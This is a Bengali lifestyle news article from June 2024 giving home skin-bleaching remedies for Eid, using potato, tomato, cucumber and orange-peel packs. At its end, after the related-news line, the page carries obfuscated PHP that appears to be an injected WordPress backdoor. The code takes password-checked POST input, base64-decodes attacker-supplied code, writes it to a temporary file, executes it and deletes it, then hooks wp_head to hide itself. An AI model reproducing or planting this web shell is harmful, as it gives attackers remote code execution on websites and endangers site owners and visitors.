সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

ঈদের আগে ঘরে বসেই ত্বক ব্লিচ!

news-image

লাইফস্টাইল ডেস্ক : ত্বকের দাগ দূর ও উজ্জ্বল করতে মেয়েদের কাছে ব্লিচ পরিচিত নাম। ঈদের আগে পার্লারে ভিড় থাকা সত্ত্বেও অনেকেই ব্লিচ করতে যান। কিন্তু যারা সময় পাচ্ছেন না পার্লারে যাওয়ার তারা কি করবেন তাহলে? চিন্তা নেই এমন ব্যস্ত নারীদের জন্য দেয়া হলো ঘরোয়া উপায়ে ব্লিচ করার পদ্ধতি। এখনই জেনে নিন উপায়গুলো আর ঈদের আগে ঘরে বসেই করুন ব্লিচ।

আলু
সবার বাড়িতেই ব্লিচ করার এই উপকরণটি পাওয়া যাবে সহজে। একটি আলুর খোসা ছাড়িয়ে মিহি কুচি করে নিন। তার সাথে মেশান অল্প গোলাপজল। এবার ব্লেন্ডারে ব্লেন্ড করুন। ব্যাস তৈরি হয়ে গেল প্যাক।

কিন্তু আপনার ত্ত্বক অতিরিক্ত রুক্ষ হলে সামান্য মধু যোগ করতে পারেন। আর ত্বক তৈলাক্ত হলে কয়েক ফোঁটা লেবুর রস মেশান।

এবার মুখ ও গলার ত্বকে মিশ্রণটি লাগিয়ে রাখুন। শুকিয়ে গেলে ধুয়ে ফেলুন। ত্বক হবে উজ্জ্বল ও দাগহীন।

টমেটো
সারা বছরই পাওয়া যায় টমেটো। তাই আপনি চাইলে সব সময় এই প্যাকটি ব্যবহার করতে পারবেন। একটি পাকা টমেটো চটকে এর সাথে ১ চা চামচ দই মিশিয়ে নিন। প্যাকটি ত্বকে লাগিয়ে রাখুন। শুকিয়ে গেলে কুসুম গরম পানি দিয়ে ধুয়ে ফেলুন। এটি টোনার হিসেবেও কাজ করে।

শসা
শসা থেকে রস সংগ্রহ করুন। শসার রসের সঙ্গে অ্যালোভেরার রস মেশান। মুখ, গলা ও ঘাড়ের ত্বকে মিশ্রণটি লাগান। উজ্জ্বল হবে ত্বক।

কমলার খোসা
কমলার খোসায় থাকা ভিটামিন সি ও অ্যাসিডিক উপাদান যা প্রাকৃতিকভাবে ব্লিচ করে ত্বক। কমলার খোসা রোদে শুকিয়ে গুঁড়া করে নিন।

এরপর কমলার খোসার গুঁড়ার সঙ্গে মধু ও গোলাপজল মিশিয়ে পেস্ট তৈরি করুন। মিশ্রণটি ত্বকে লাগিয়ে রাখুন। শুকিয়ে গেলে ঠাণ্ডা পানি দিয়ে ধুয়ে ফেলুন।

এই প্যাক গুলোর যে কোনো একটি আপনার ত্বক বুঝে ব্যবহার করুন। আর ঈদের আগেই পেয়ে যান উজ্জ্বল ও দাগহীন ত্বক।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}